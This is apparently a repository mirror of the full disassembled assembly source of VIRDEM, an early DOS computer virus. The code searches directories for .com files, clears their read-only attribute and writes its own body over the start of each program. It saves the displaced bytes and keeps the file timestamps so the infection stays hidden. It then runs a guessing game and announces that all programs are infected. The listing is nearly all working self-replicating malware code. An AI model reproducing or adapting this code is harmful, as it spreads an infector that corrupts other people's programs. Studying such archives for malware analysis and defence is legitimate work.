mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
488 lines
23 KiB
NASM
488 lines
23 KiB
NASM
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
|
;ÛÛ ÛÛ
|
|
;ÛÛ VIRDEM ÛÛ
|
|
;ÛÛ ÛÛ
|
|
;ÛÛ Created: 16-Mar-87 ÛÛ
|
|
;ÛÛ Version: ÛÛ
|
|
;ÛÛ Passes: 5 Analysis Options on: QRS ÛÛ
|
|
;ÛÛ Copyright by R.Burger 1986,1987 ÛÛ
|
|
;ÛÛ ÛÛ
|
|
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
|
|
|
data_1e equ 80h ; (8C04:0080=0)
|
|
data_2e equ 9Eh ; (8C04:009E=0)
|
|
data_16e equ 0F800h ; (8C04:F800=0)
|
|
data_17e equ 0FD00h ; (8C04:FD00=0)
|
|
|
|
seg_a segment byte public
|
|
assume cs:seg_a, ds:seg_a
|
|
|
|
|
|
org 100h
|
|
|
|
virdem proc far
|
|
|
|
start:
|
|
nop
|
|
nop
|
|
nop
|
|
mov sp,0FE00h
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push bp
|
|
push si
|
|
push di
|
|
push ds
|
|
push es
|
|
push ss
|
|
pushf ; Push flags
|
|
mov si,data_1e ; (8C04:0080=0)
|
|
lea di,cs:[3BFh] ; Load effective addr
|
|
mov cx,20h
|
|
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
|
mov ax,0
|
|
mov es:data_5,ax ; (8C04:038F=0)
|
|
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
|
|
cmp bl,39h ; '9'
|
|
je loc_1 ; Jump if equal
|
|
inc bl
|
|
loc_1: ; xref 8C04:012C
|
|
mov byte ptr es:data_12+0Dh,bl ; (8C04:0422=30h)
|
|
|
|
mov ah,19h
|
|
int 21h ; DOS Services ah=function 19h
|
|
; get default drive al (0=a:)
|
|
mov cs:data_10,al ; (8C04:03E1=0)
|
|
mov ah,47h ; 'G'
|
|
mov dh,0
|
|
add al,1
|
|
mov dl,al
|
|
lea si,cs:[3E3h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 47h
|
|
; get present dir,drive dl,1=a:
|
|
jmp short loc_3 ; (016D)
|
|
db 90h
|
|
loc_2: ; xref 8C04:0191, 01A0
|
|
mov ah,40h ; '@'
|
|
mov bx,1
|
|
mov cx,34h
|
|
nop
|
|
lea dx,cs:[57Ch] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
mov dx,cs:data_6 ; (8C04:0391=600h)
|
|
mov cs:data_17e,dx ; (8C04:FD00=0)
|
|
jmp loc_12 ; (02E4)
|
|
jmp loc_12 ; (02E4)
|
|
loc_3: ; xref 8C04:014B
|
|
mov dl,0
|
|
mov ah,0Eh
|
|
int 21h ; DOS Services ah=function 0Eh
|
|
; set default drive dl (0=a:)
|
|
mov ah,3Bh ; ';'
|
|
lea dx,cs:[3DFh] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 3Bh
|
|
; set current dir, path @ ds:dx
|
|
jmp short loc_7 ; (01C9)
|
|
db 90h
|
|
loc_4: ; xref 8C04:01D4, 01E7
|
|
mov ah,3Bh ; ';'
|
|
lea dx,cs:[3DFh] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 3Bh
|
|
; set current dir, path @ ds:dx
|
|
mov ah,4Eh ; 'N'
|
|
mov cx,11h
|
|
lea dx,cs:[399h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 4Eh
|
|
; find 1st filenam match @ds:dx
|
|
jc loc_2 ; Jump if carry Set
|
|
mov bx,cs:data_5 ; (8C04:038F=0)
|
|
inc bx
|
|
dec bx
|
|
jz loc_6 ; Jump if zero
|
|
loc_5: ; xref 8C04:01A3
|
|
mov ah,4Fh ; 'O'
|
|
int 21h ; DOS Services ah=function 4Fh
|
|
; find next filename match
|
|
jc loc_2 ; Jump if carry Set
|
|
dec bx
|
|
|
|
jnz loc_5 ; Jump if not zero
|
|
loc_6: ; xref 8C04:019A
|
|
mov ah,2Fh ; '/'
|
|
int 21h ; DOS Services ah=function 2Fh
|
|
; get DTA ptr into es:bx
|
|
add bx,1Ch
|
|
mov word ptr es:[bx],5C20h
|
|
inc bx
|
|
push ds
|
|
mov ax,es
|
|
mov ds,ax
|
|
mov dx,bx
|
|
mov ah,3Bh ; ';'
|
|
int 21h ; DOS Services ah=function 3Bh
|
|
; set current dir, path @ ds:dx
|
|
pop ds
|
|
mov bx,cs:data_5 ; (8C04:038F=0)
|
|
inc bx
|
|
mov cs:data_5,bx ; (8C04:038F=0)
|
|
loc_7: ; xref 8C04:017B
|
|
mov ah,4Eh ; 'N'
|
|
mov cx,1
|
|
lea dx,cs:[393h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 4Eh
|
|
; find 1st filenam match @ds:dx
|
|
jc loc_4 ; Jump if carry Set
|
|
mov bx,es:data_5 ; (8C04:038F=0)
|
|
cmp bx,0
|
|
je loc_8 ; Jump if equal
|
|
jmp short loc_9 ; (01E9)
|
|
db 90h
|
|
loc_8: ; xref 8C04:01DE, 020D
|
|
mov ah,4Fh ; 'O'
|
|
int 21h ; DOS Services ah=function 4Fh
|
|
; find next filename match
|
|
jc loc_4 ; Jump if carry Set
|
|
loc_9: ; xref 8C04:01E0
|
|
mov ah,3Dh ; '='
|
|
mov al,2
|
|
mov dx,data_2e ; (8C04:009E=0)
|
|
int 21h ; DOS Services ah=function 3Dh
|
|
; open file, al=mode,name@ds:dx
|
|
mov bx,ax
|
|
mov ah,3Fh ; '?'
|
|
mov cx,500h
|
|
nop
|
|
mov dx,data_16e ; (8C04:F800=0)
|
|
nop
|
|
int 21h ; DOS Services ah=function 3Fh
|
|
; read file, cx=bytes, to ds:dx
|
|
mov ah,3Eh ; '>'
|
|
int 21h ; DOS Services ah=function 3Eh
|
|
; close file, bx=file handle
|
|
mov bx,cs:data_16e ; (8C04:F800=0)
|
|
cmp bx,9090h
|
|
je loc_8 ; Jump if equal
|
|
mov ah,43h ; 'C'
|
|
|
|
mov al,0
|
|
mov dx,data_2e ; (8C04:009E=0)
|
|
int 21h ; DOS Services ah=function 43h
|
|
; get/set file attrb, nam@ds:dx
|
|
mov ah,43h ; 'C'
|
|
mov al,1
|
|
and cx,0FEh
|
|
int 21h ; DOS Services ah=function 43h
|
|
; get/set file attrb, nam@ds:dx
|
|
mov ah,3Dh ; '='
|
|
mov al,2
|
|
mov dx,data_2e ; (8C04:009E=0)
|
|
int 21h ; DOS Services ah=function 3Dh
|
|
; open file, al=mode,name@ds:dx
|
|
mov bx,ax
|
|
mov ah,57h ; 'W'
|
|
mov al,0
|
|
int 21h ; DOS Services ah=function 57h
|
|
; get/set file date & time
|
|
push cx
|
|
push dx
|
|
mov ah,42h ; 'B'
|
|
mov al,2
|
|
mov dx,0
|
|
mov cx,0
|
|
int 21h ; DOS Services ah=function 42h
|
|
; move file ptr, cx,dx=offset
|
|
test ax,8000h
|
|
jnz loc_10 ; Jump if not zero
|
|
cmp ax,500h
|
|
nop
|
|
ja loc_10 ; Jump if above
|
|
call sub_3 ; (0380)
|
|
loc_10: ; xref 8C04:0244, 024A
|
|
push ax
|
|
push dx
|
|
mov ah,40h ; '@'
|
|
mov cx,500h
|
|
nop
|
|
mov dx,data_16e ; (8C04:F800=0)
|
|
nop
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
pop dx
|
|
pop ax
|
|
add ax,100h
|
|
mov es:data_4,ax ; (8C04:02BD=0)
|
|
add ax,500h
|
|
nop
|
|
mov dx,cs:data_6 ; (8C04:0391=600h)
|
|
mov cs:data_17e,dx ; (8C04:FD00=0)
|
|
mov es:data_6,ax ; (8C04:0391=600h)
|
|
mov ah,40h ; '@'
|
|
mov cx,38h
|
|
nop
|
|
lea dx,cs:[287h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
|
|
; write file cx=bytes, to ds:dx
|
|
jmp short loc_11 ; (02C0)
|
|
db 90h
|
|
db 0BFh, 80h, 00h, 8Dh, 36h,0BFh
|
|
db 03h,0B9h, 20h, 00h,0F3h,0A4h
|
|
db 0E8h, 00h, 00h
|
|
|
|
virdem endp
|
|
|
|
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
|
; SUBROUTINE
|
|
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
|
|
sub_1 proc near
|
|
pop ax
|
|
mov bx,27h
|
|
nop
|
|
add ax,bx
|
|
mov si,ax
|
|
mov bx,es:[si]
|
|
mov si,bx
|
|
mov di,offset ds:[100h] ; (8C04:0100=90h)
|
|
mov cx,500h
|
|
nop
|
|
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
|
popf ; Pop flags
|
|
pop ss
|
|
pop es
|
|
pop ds
|
|
pop di
|
|
pop si
|
|
pop bp
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
mov ax,offset start
|
|
push ax
|
|
ret
|
|
sub_1 endp
|
|
|
|
data_4 dw 0 ; xref 8C04:0262
|
|
db 90h
|
|
loc_11: ; xref 8C04:0284
|
|
mov ah,42h ; 'B'
|
|
mov al,0
|
|
mov dx,0
|
|
mov cx,0
|
|
int 21h ; DOS Services ah=function 42h
|
|
; move file ptr, cx,dx=offset
|
|
mov ah,40h ; '@'
|
|
mov cx,500h
|
|
nop
|
|
lea dx,cs:[100h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
mov ah,57h ; 'W'
|
|
|
|
mov al,1
|
|
pop dx
|
|
pop cx
|
|
int 21h ; DOS Services ah=function 57h
|
|
; get/set file date & time
|
|
mov ah,3Eh ; '>'
|
|
int 21h ; DOS Services ah=function 3Eh
|
|
; close file, bx=file handle
|
|
loc_12: ; xref 8C04:0167, 016A
|
|
nop
|
|
call sub_2 ; (036E)
|
|
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
|
|
cmp bl,31h ; '1'
|
|
jne loc_13 ; Jump if not equal
|
|
mov ah,40h ; '@'
|
|
mov bx,1
|
|
mov cx,67h
|
|
nop
|
|
lea dx,cs:[404h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
mov ah,0
|
|
int 21h ; DOS Services ah=function 00h
|
|
; terminate, cs=progm seg prefx
|
|
loc_13: ; xref 8C04:02F0
|
|
mov ah,40h ; '@'
|
|
mov bx,1
|
|
mov cx,102h
|
|
nop
|
|
lea dx,cs:[404h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
mov ah,2
|
|
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
|
|
mov dl,bl
|
|
int 21h ; DOS Services ah=function 02h
|
|
; display char dl
|
|
mov ah,2Ch ; ','
|
|
int 21h ; DOS Services ah=function 2Ch
|
|
; get time, cx=hrs/min, dh=sec
|
|
mov ah,0Ch
|
|
mov al,1
|
|
int 21h ; DOS Services ah=function 0Ch
|
|
; clear keybd buffer & input al
|
|
or dl,30h ; '0'
|
|
and dl,bl
|
|
cmp dl,al
|
|
je loc_14 ; Jump if equal
|
|
mov bl,dl
|
|
mov ah,2
|
|
mov dl,20h ; ' '
|
|
int 21h ; DOS Services ah=function 02h
|
|
; display char dl
|
|
mov dl,3Eh ; '>'
|
|
int 21h ; DOS Services ah=function 02h
|
|
; display char dl
|
|
mov dl,bl
|
|
|
|
int 21h ; DOS Services ah=function 02h
|
|
; display char dl
|
|
mov dl,3Ch ; '<'
|
|
int 21h ; DOS Services ah=function 02h
|
|
; display char dl
|
|
mov ah,40h ; '@'
|
|
mov bx,1
|
|
mov cx,3Ch
|
|
nop
|
|
lea dx,cs:[507h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
mov ah,0
|
|
int 21h ; DOS Services ah=function 00h
|
|
; terminate, cs=progm seg prefx
|
|
loc_14: ; xref 8C04:0330
|
|
mov ah,40h ; '@'
|
|
mov bx,1
|
|
mov cx,37h
|
|
nop
|
|
lea dx,cs:[544h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 40h
|
|
; write file cx=bytes, to ds:dx
|
|
mov ax,es:data_17e ; (8C04:FD00=0)
|
|
push ax
|
|
ret
|
|
|
|
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
|
; SUBROUTINE
|
|
;
|
|
; Called from: 8C04:02E5
|
|
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
|
|
sub_2 proc near
|
|
mov ah,0Eh
|
|
mov dl,cs:data_10 ; (8C04:03E1=0)
|
|
int 21h ; DOS Services ah=function 0Eh
|
|
; set default drive dl (0=a:)
|
|
mov ah,3Bh ; ';'
|
|
lea dx,cs:[3E2h] ; Load effective addr
|
|
int 21h ; DOS Services ah=function 3Bh
|
|
; set current dir, path @ ds:dx
|
|
ret
|
|
sub_2 endp
|
|
|
|
|
|
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
|
; SUBROUTINE
|
|
;
|
|
; Called from: 8C04:024C
|
|
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
|
|
|
sub_3 proc near
|
|
mov ah,42h ; 'B'
|
|
mov al,0
|
|
mov dx,500h
|
|
nop
|
|
|
|
mov cx,0
|
|
int 21h ; DOS Services ah=function 42h
|
|
; move file ptr, cx,dx=offset
|
|
ret
|
|
sub_3 endp
|
|
|
|
db 0
|
|
data_5 dw 0 ; xref 8C04:0120, 0193, 01BE, 01C4
|
|
; 01D6
|
|
data_6 dw 600h ; xref 8C04:015D, 026A, 0274
|
|
db "*.com", 00h
|
|
db 2Ah, 00h,0FFh, 00h, 00h, 00h
|
|
db 00h, 00h, 3Fh, 00h
|
|
db "????????exe"
|
|
db 00h, 00h, 00h
|
|
db 00h, 00h
|
|
db "????????com"
|
|
db 33 dup (0)
|
|
db 5Ch, 00h
|
|
data_10 db 0 ; xref 8C04:0139, 0370
|
|
db 5Ch
|
|
db 33 dup (0)
|
|
db 'Virdem Ver.: 1.06'
|
|
|
|
|
|
data_12 db ' (Generation 0) aktive.', 0Ah, 0Dh
|
|
|
|
copyright db 'Copyright by R.Burger 1986,1987'
|
|
db 0Ah, 0Dh, 'Phone.: D - 05932/5451'
|
|
db ' ', 0Ah, 0Dh, ' ', 0Ah, 0Dh, 'T'
|
|
db 'his is a demoprogram for ', 0Ah, 0Dh
|
|
db 'computerviruses. Please put in a'
|
|
db ' ', 0Ah, 0Dh, 'number now.', 0Ah
|
|
db 0Dh, 'If you', 27h, 're right, yo'
|
|
db 'u', 27h, 'll be', 0Ah, 0Dh, 'abl'
|
|
db 'e to continue.', 0Ah, 0Dh, 'The '
|
|
db 'number is between ', 0Ah, 0Dh, '0'
|
|
db ' and ', 0
|
|
db 0Ah, 0Dh, 'Sorry, you', 27h, 're '
|
|
db 'wrong', 0Ah, 0Dh, ' ', 0Ah
|
|
db 0Dh, 'More luck at next try ....', 0Ah
|
|
db 0Dh, 0
|
|
db 0Ah, 0Dh, 'Famous. You', 27h, 're'
|
|
db ' right.', 0Ah, 0Dh, 'You', 27h, 'l'
|
|
db 'l be able to continue. ', 0Ah, 0Dh
|
|
db 0
|
|
db 0Ah, 0Dh, 'All your programs are', 0Ah
|
|
db 0Dh, 'struck by VIRDEM.COM now.', 0Ah
|
|
db 0Dh
|
|
db 0
|
|
|
|
seg_a ends
|
|
|
|
end start
|
|
|
|
±±±±±±±±±±±±±±±±±±±± CROSS REFERENCE - KEY ENTRY POINTS ±±±±±±±±±±±±±±±±±±±
|
|
|
|
seg:off type label
|
|
---- ---- ---- ---------------
|
|
8C04:0100 far start
|
|
|
|
±±±±±±±±±±±±±±±±±± Interrupt Usage Synopsis ±±±±±±±±±±±±±±±±±±
|
|
|
|
Interrupt 21h : terminate, cs=progm seg prefx
|
|
Interrupt 21h : display char dl
|
|
Interrupt 21h : clear keybd buffer & input al
|
|
Interrupt 21h : set default drive dl (0=a:)
|
|
Interrupt 21h : get default drive al (0=a:)
|
|
Interrupt 21h : get time, cx=hrs/min, dh=sec
|
|
Interrupt 21h : get DTA ptr into es:bx
|
|
Interrupt 21h : set current dir, path @ ds:dx
|
|
Interrupt 21h : open file, al=mode,name@ds:dx
|
|
Interrupt 21h : close file, bx=file handle
|
|
Interrupt 21h : read file, cx=bytes, to ds:dx
|
|
Interrupt 21h : write file cx=bytes, to ds:dx
|
|
Interrupt 21h : move file ptr, cx,dx=offset
|
|
Interrupt 21h : get/set file attrb, nam@ds:dx
|
|
Interrupt 21h : get present dir,drive dl,1=a:
|
|
Interrupt 21h : find 1st filenam match @ds:dx
|
|
Interrupt 21h : find next filename match
|
|
Interrupt 21h : get/set file date & time
|
|
|
|
±±±±±±±±±±±±±±±±±± I/O Port Usage Synopsis ±±±±±±±±±±±±±±±±±±
|
|
|
|
No I/O ports used.
|
|
|